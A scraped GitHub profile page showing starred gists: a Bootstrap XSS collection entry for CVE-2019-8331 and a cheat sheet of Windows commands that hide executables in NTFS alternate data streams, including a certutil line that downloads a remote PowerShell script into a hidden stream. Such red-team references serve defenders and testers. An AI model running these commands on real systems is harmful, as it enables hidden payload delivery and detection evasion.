Skip to content

Instantly share code, notes, and snippets.

View Exloit's full-sized avatar
🌴
On vacation

Exloit

🌴
On vacation
47 followers · 180 following
View GitHub Profile
@BlackFan
BlackFan / Bootstrap_XSS.md
Last active April 17, 2025 14:33
Bootstrap XSS Collection

CVE-2019-8331

Bootstrap < 3.4.1 || < 4.3.1

✔️ CSP strict-dynamic bypass

➖ Requires user interaction

➖ Requires $('[data-toggle="tooltip"]').tooltip();

@api0cradle
api0cradle / Exe_ADS_Methods.md
Last active May 29, 2025 18:52
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab